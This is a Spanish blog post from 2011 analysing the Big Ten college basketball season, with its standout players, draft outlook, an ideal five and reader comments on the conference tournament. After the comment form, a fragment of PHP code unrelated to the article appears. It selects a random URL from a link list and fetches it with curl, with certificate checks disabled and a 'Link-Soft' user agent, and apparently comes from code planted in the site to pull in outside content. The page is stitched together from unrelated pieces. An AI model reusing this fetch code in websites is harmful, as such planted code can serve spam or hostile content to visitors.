Análisis NCAA – Big Ten Conference

08 de March de 2011 por kantonyo

A unos días del comienzo de la Week Champ en la que se van a decidir los campeones de los torneos de conferencia, dedicamos nuestro análisis a la Big Ten Conference.

Al igual que ocurrió el año pasado, las universidades de Ohio State y Purdue se están disputando hasta el último día el título de la liga regular. Este año, a diferencia del anterior, Wisconsin ha sido el convidado de piedra en lugar de Michigan State.

En Ohio State, decidieron apostar por el ala-pívot de primer año Jared Sullinger tras la marcha de su estrella Evan Turner a la NBA. Jared, nacido en Columbus (sede de la Universidad de Ohio State), vino tras ser premiado el año pasado con el Naismith Prep Player of the Year (Mejor jugador del High School), premio anteriormente entregado a jugadores como Derrick Favors, Kevin Love, Dwight Howard, LeBron James o Kobe Bryant entre otros. Sullinger es un ala-pívot que destaca por su gran habilidad y velocidad de movimientos debajo del tablero pero con pocos recursos defensivos por el momento. Ha promediado 17 puntos y 10 rebotes en 30 minutos de juego. En este momento, todos los mockdraft le sitúan en el top5 de cara al próximo draft.

Con este refuerzo, los Buckeyes de Ohio State han conseguido situarse como el primer equipo del ránking de la Associated Press y por lo tanto, máximo favorito a llevarse el título final de la NCAA. La columna vertebral del equipo siguen siendo los escoltas William Buford, David Lighty y Jon Diebler. Y en los últimos meses está empezando a destacar el joven alero de primer año, Deshaun Thomas. En el puesto de base, otro jugador de primer año, Aaron Craft, no está cumpliendo con las expectativas. Aún así, donde más están sufriendo los Buckeyes es en el poste alto donde tienen grandes problemas reboteadores debido a la carencia de un pívot en la plantilla.

Los Boilermakers de Purdue han vuelto a ver este año como su gran estrella, Robbie Hummel, volvía a lesionarse de gravedad perdiéndose toda la temporada. Sin grandes refuerzos, de nuevo el alapívot JaJuan Johnson y el escolta E’Twaun Moore han vuelto a ser fundamentales para los buenos resultados de la universidad del estado de Indiana. JaJuan Johnson, en su cuarto año, es el jugador con mejor eficiencia de la conferencia, el máximo anotador con 20 puntos por partido y el más taponador con 2,4 de media. En este momento los mockdraft apuestan a que estará en los últimos puestos de la primera ronda del draft. Por su parte, E’Twaun Moore también en su cuarto año, ha tenido grandes actuaciones como en la victoria contra Ohio State donde anotó 38 puntos. Purdue se situa como sexto mejor equipo de la NCAA según Associated Press.

La gran revelación de la Big Ten han sido los Badgers de Wisconsin. Con sólo cuatro derrotas se han colocado en el puesto 10 del AP TOP. Jordan Taylor está teniendo una progresión enorme en los últimos partidos, llegando a anotar 30 puntos contra Michigan State o 39 contra Indiana. Es un base completo, buen lanzador, dinámico y constante en el juego. El alapívot Jon Leuer ha vuelto a dar un salto de calidad esta temporada, llegando a promediar 19 puntos y 7 rebotes, con unos porcentajes de triples cercanos al 40%. Leuer, además de ser un jugador muy rocoso debajo del tablero, es también muy peligroso fuera de la zona, gracias a su buen lanzamiento de larga distancia y a su capacidad de penetración a canasta. En el próximo draft estará rozando los puestos de primera ronda.

Después de estos tres equipos claramente ya clasificados para el March Madness, se sitúan los Spartans de Michigan State. Este año parece más complicado que vuelvan a disputar la Final Four como han hecho los últimos dos años. Kalin Lucas decidió aguantar un año más antes de dar el salto a la NBA, y por el momento parece haberse equivocado ya que será difícil que sea elegido en primera ronda del draft sino mejoran mucho las cosas. Draymond Green, alapívot de tercer año, tuvo un buen comienzo de temporada, pero su llama se ha ido apagando a la vez que los Spartans iban entrando en una racha de derrotas en los meses de enero y febrero que les han dejado fuera del ranking de los 25 mejores.

Otros jugadores que están destacando son el espectacular alapívot de segundo año de Minnesota, Trevor Mbakwe, mejor reboteador de la conferencia; el alero de primer año, Melsahn Besabe que se está abriendo hueco en los débiles Hawkeyes de Iowa; el escolta Talor Battle de Penn State, que promedia 20 puntos por partido; y el joven base de Michigan, Darius Morris, mejor asistente de la Big Ten. También destacar el bajo rendimiento de John Shurna, alapívot de Northwestern que ha visto frenado su gran rendimiento en la segunda mitad de la temporada.

Quinteto Ideal

C – JaJuan Johnson (Purdue)
PF – Jon Leuer (Wisconsin)
PF – Jared Sullinger (Ohio State)
SG – E’Twaun Moore (Purdue)
PG – Jordan Taylor (Wisconsin)

Otros jugadores a seguir

– Centers: Mike Tisdale (Illinois), Ralph Sampson III (Minnesota)
– Forwards: Trevor Mbakwe (Minnesota), Draymond Green (Michigan State), Jeff Brooks (Penn State), John Shurna (Northwestern), Mike Davis (Illinois), Deshaun Thomas (Ohio State), Melsahn Basabe (Iowa), Christian Watford (Indiana)
– Guards: Darius Morris (Michigan), Talor Battle (Penn State), Demetri McCarney (Illinois), Michael Thompson (Northwestern), William Buford (Ohio State), David Lighty (Ohio State), Kalin Lucas (Michigan State)

Comenta

7 comentarios a esta entrada

  1. kantonyo dice:
    #1

    En el último partido de la Regular Season, Ohio State machacó a Wisconsin con un partidazo de Jared Sullinger y los escoltas Diebler, Buford y Lighty. La corta plantilla de Wisconsin no pudo hacer nada y solo Jon Leuer y Josh Gasser estuvieron a la altura, mal partido de Jordan Taylor.

    La Big Ten ha quedado asi:

    1. Ohio State 16-2
    2. Purdue 14-4
    3. Wisconsin 13-5
    4. Michigan 9-9
    5. Illinois 9-9
    6. Michigan State 9-9
    7. Penn State 9-9
    8. Northwestern 7-11
    9. Minnesota 6-12
    10. Iowa 4-14
    11. Indiana 3-15

    Y los playoffs asi:

    #1 Ohio State vs Northwestern/Minnesota
    #4 Michigan vs Illinois

    #2 Purdue vs Michigan St/Iowa
    #3 Wisconsin vs PennSt/Indiana

      Citar

  2. Denise dice:
    #2

    pregunta para kantonyo o alguien que entienda de NCAA

    ¿Es cierto que el proximo draft va a ser a priori una bacalá y no van a salir jugadores de primer nivel, como he leido en otros sitios?

      Citar

  3. Txusma dice:
    #3

    Yo tb he leído eso pero en teoría el año de Jennings, Evans, Harden, Curry tb era una bacalá y creo que jugadores buenos salieron, no?

      Citar

  4. luigi_sal dice:
    #4

    hay una cosa con la que no estoy de acuerdo. en ohio state tienen a dallas lauderdale que se dedica casi exclusivamente a defender y a rebotear. no son un mal conjunto en ese aspecto…q pena lo de hummel para los boilemakers

      Citar

  5. kantonyo dice:
    #5

    Es muy precipitado el decir que este draft va a ser una bacalá. Ha habido muchas lesiones, algunas decepciones y otras sanciones que han lastrado el talento y el potencial de este año. Por el contrario desde Europa pueden llegar algunas perlas como ya dijimos hace unas semanas.

    Por eso es tan importante seguir el March Madness pq seguro que alguien va a sacar la cabecita…

    Respecto a Dallas Lauderdale, ha bajado drasticamente sus minutos en pista en su cuarto año, solo disputa 17 de media, y no es un pívot clasico, se queda en los los 2,04. Por eso decia que Ohio State está muy cojo en ese aspecto. Pero, Luigi_sal me alegro que solo haya una cosa en la que no estés de acuerdo. XD

      Citar

  6. Denise dice:
    #6

    Ok. yo es lo que he leido en otros sitios, que no va a salir ningún jugador franquicia.
    En el mock de nbadraft.net, el nº1 es ahora mismo un tall Derrick Williams, si pnchas en su enlace verás que lo comparan con Beasley y David West, que no son jugadores franquicias precisamente.
    Habrá que esperar y dar tiempo, a ver que sale de la nueva hornada.

      Citar

  7. kantonyo dice:
    #7

    Ohio State y Penn State se veran las caras hoy en la final de la Big Ten.

    Ohio State, número 1 en el ranking de la NCAA ha llegado a la final tras derrotar en un dificil partido a Northwestern donde Jared Sullinger anotó 20 puntos y capturó 18 rebotes. El buen partido del alapívot John Shurna estuvo a punto de dar la sorpresa en el Conseco Fieldhouse de Indiana.

    En las semifinales los Buckeyes de Ohio State tuvieron menos problemas para ganar a Michigan con otra actuación digna de Jared Sullinger con 14 pt y 13 reb y bien acompañado de Jon Diebler con 16 puntos y Buford con 14. En los Wolverines Tim Hardaway Jr fue el mejor con 15 puntos.

    El otro finalista, los sorprendentes Nittany Lions de Penn State, llegan trás dejar atras a #13 Wisconsin en un partido ultradefensivo donde el marcador se quedó en 36-33. Jordan Taylor en Wisconsin fue el único que consiguió superar los 10 puntos anotando la mitad de su equipo (16 pt). A pesar de esta dolorosa derrota los Badgers tienen practicamete garantizada su plaza en el March Madness.

    El segundo favorito de la conferencia. los Boliermakers de Purdue fueron derrotados por Michigan State con la mejor actuación de Kalin Lucas en la NCAA (30 puntos). JaJuan Johnson (21 pt+9 reb) y Etwaun Moore (17 pt) no fueron suficientes.

    En la semifinal Penn State supo parar a Kalin Lucas gracias a su gran defensa perimetral. El base Talor Battle con 25 puntos y el escolta Tim Frazier con 22 estuvieron perfectos tanto en ataque como en defensa. A reseñar el mal torneo y el bajón que ha tenido el alapívot de Michigan State, Draymond Green.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>